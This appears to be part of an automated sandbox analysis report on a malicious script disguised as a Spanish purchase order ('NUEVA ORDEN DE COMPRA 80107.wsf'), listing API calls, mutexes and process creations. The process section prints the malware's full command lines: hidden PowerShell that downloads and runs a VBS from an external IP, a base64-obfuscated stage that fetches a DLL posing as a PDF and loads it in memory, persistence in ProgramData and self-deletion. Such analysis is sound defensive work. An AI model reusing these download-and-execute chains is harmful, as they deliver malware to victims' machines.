Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040820A0	27_2_040820A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_041220A8	27_2_041220A8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_041228EC	27_2_041228EC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0405F900	27_2_0405F900
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04074120	27_2_04074120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040799BF	27_2_040799BF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0410FA2B	27_2_0410FA2B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_041222AE	27_2_041222AE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04122B28	27_2_04122B28
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0407AB40	27_2_0407AB40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0408EBB0	27_2_0408EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0411DBD2	27_2_0411DBD2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_041103DA	27_2_041103DA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_032190A0	27_2_032190A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0321909B	27_2_0321909B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0322CFAA	27_2_0322CFAA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03212FB0	27_2_03212FB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03212D88	27_2_03212D88
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03212D90	27_2_03212D90

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 0405B150 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0291B150 appears 45 times

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00418AA0 NtCreateFile,	15_2_00418AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00418B50 NtReadFile,	15_2_00418B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00418BD0 NtClose,	15_2_00418BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00418C80 NtAllocateVirtualMemory,	15_2_00418C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00418A9A NtCreateFile,	15_2_00418A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00418BCA NtReadFile,	15_2_00418BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959A00 NtProtectVirtualMemory,LdrInitializeThunk,	15_2_02959A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959A20 NtResumeThread,LdrInitializeThunk,	15_2_02959A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959A50 NtCreateFile,LdrInitializeThunk,	15_2_02959A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029598F0 NtReadVirtualMemory,LdrInitializeThunk,	15_2_029598F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959840 NtDelayExecution,LdrInitializeThunk,	15_2_02959840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959860 NtQuerySystemInformation,LdrInitializeThunk,	15_2_02959860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029599A0 NtCreateSection,LdrInitializeThunk,	15_2_029599A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959910 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_02959910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029596E0 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_029596E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959660 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_02959660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959780 NtMapViewOfSection,LdrInitializeThunk,	15_2_02959780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029597A0 NtUnmapViewOfSection,LdrInitializeThunk,	15_2_029597A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959FE0 NtCreateMutant,LdrInitializeThunk,	15_2_02959FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959710 NtQueryInformationToken,LdrInitializeThunk,	15_2_02959710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029595D0 NtClose,LdrInitializeThunk,	15_2_029595D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959540 NtReadFile,LdrInitializeThunk,	15_2_02959540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959A80 NtOpenDirectoryObject,	15_2_02959A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959A10 NtQuerySection,	15_2_02959A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0295A3B0 NtGetContextThread,	15_2_0295A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959B00 NtSetValueKey,	15_2_02959B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029598A0 NtWriteVirtualMemory,	15_2_029598A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959820 NtEnumerateKey,	15_2_02959820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0295B040 NtSuspendThread,	15_2_0295B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029599D0 NtCreateProcessEx,	15_2_029599D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959950 NtQueueApcThread,	15_2_02959950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029596D0 NtCreateKey,	15_2_029596D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959610 NtEnumerateValueKey,	15_2_02959610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959650 NtQueryValueKey,	15_2_02959650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959670 NtQueryInformationProcess,	15_2_02959670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0295A710 NtOpenProcessToken,	15_2_0295A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959730 NtQueryVirtualMemory,	15_2_02959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959770 NtSetInformationFile,	15_2_02959770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0295A770 NtOpenThread,	15_2_0295A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959760 NtOpenProcess,	15_2_02959760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029595F0 NtQueryInformationFile,	15_2_029595F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0295AD30 NtSetContextThread,	15_2_0295AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959520 NtWaitForSingleObject,	15_2_02959520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02959560 NtWriteFile,	15_2_02959560
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099540 NtReadFile,LdrInitializeThunk,	27_2_04099540
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040995D0 NtClose,LdrInitializeThunk,	27_2_040995D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099650 NtQueryValueKey,LdrInitializeThunk,	27_2_04099650
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099660 NtAllocateVirtualMemory,LdrInitializeThunk,	27_2_04099660
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040996D0 NtCreateKey,LdrInitializeThunk,	27_2_040996D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040996E0 NtFreeVirtualMemory,LdrInitializeThunk,	27_2_040996E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099710 NtQueryInformationToken,LdrInitializeThunk,	27_2_04099710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099780 NtMapViewOfSection,LdrInitializeThunk,	27_2_04099780
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099FE0 NtCreateMutant,LdrInitializeThunk,	27_2_04099FE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099840 NtDelayExecution,LdrInitializeThunk,	27_2_04099840
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099860 NtQuerySystemInformation,LdrInitializeThunk,	27_2_04099860
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099910 NtAdjustPrivilegesToken,LdrInitializeThunk,	27_2_04099910
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040999A0 NtCreateSection,LdrInitializeThunk,	27_2_040999A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099A50 NtCreateFile,LdrInitializeThunk,	27_2_04099A50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099520 NtWaitForSingleObject,	27_2_04099520
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0409AD30 NtSetContextThread,	27_2_0409AD30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099560 NtWriteFile,	27_2_04099560
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040995F0 NtQueryInformationFile,	27_2_040995F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099610 NtEnumerateValueKey,	27_2_04099610
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099670 NtQueryInformationProcess,	27_2_04099670
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0409A710 NtOpenProcessToken,	27_2_0409A710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099730 NtQueryVirtualMemory,	27_2_04099730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099760 NtOpenProcess,	27_2_04099760
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0409A770 NtOpenThread,	27_2_0409A770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099770 NtSetInformationFile,	27_2_04099770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040997A0 NtUnmapViewOfSection,	27_2_040997A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099820 NtEnumerateKey,	27_2_04099820
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0409B040 NtSuspendThread,	27_2_0409B040
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040998A0 NtWriteVirtualMemory,	27_2_040998A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040998F0 NtReadVirtualMemory,	27_2_040998F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099950 NtQueueApcThread,	27_2_04099950
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040999D0 NtCreateProcessEx,	27_2_040999D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099A00 NtProtectVirtualMemory,	27_2_04099A00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099A10 NtQuerySection,	27_2_04099A10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099A20 NtResumeThread,	27_2_04099A20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099A80 NtOpenDirectoryObject,	27_2_04099A80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04099B00 NtSetValueKey,	27_2_04099B00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0409A3B0 NtGetContextThread,	27_2_0409A3B0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03228B50 NtReadFile,	27_2_03228B50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03228BD0 NtClose,	27_2_03228BD0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03228AA0 NtCreateFile,	27_2_03228AA0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03228C80 NtAllocateVirtualMemory,	27_2_03228C80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03228BCA NtReadFile,	27_2_03228BCA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_03228A9A NtCreateFile,	27_2_03228A9A

Java / VBScript file with very long strings (likely obfuscated code)

Source: NUEVA ORDEN DE COMPRA 80107.wsf

Initial sample: Strings found which are bigger than 50

Tries to load missing DLLs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRA 80107.wsf"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm .vbs,.wsf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" C:\Windows\Temp\Done.vbs
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\Done.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm .vbs,.wsf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" C:\Windows\Temp\Done.vbs	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\Done.vbs"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFEBFBC0E17 push eax; iretd	12_2_00007FFEBFBC0E29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFEBFC917EE push ss; ret	12_2_00007FFEBFC917EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041D336 push esp; ret	15_2_0041D338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004184C6 push edi; retf	15_2_004184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004164EE pushfd ; iretd	15_2_004164EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041BDF2 push eax; ret	15_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041BDFB push eax; ret	15_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041BDA5 push eax; ret	15_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041BE5C push eax; ret	15_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0296D0D1 push ecx; ret	15_2_0296D0E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FFEBFBB000A pushfd ; ret	23_2_00007FFEBFBB002A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_040AD0D1 push ecx; ret	27_2_040AD0E4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0322D336 push esp; ret	27_2_0322D338
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0322BE5C push eax; ret	27_2_0322BE62
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0322BDA5 push eax; ret	27_2_0322BDF8
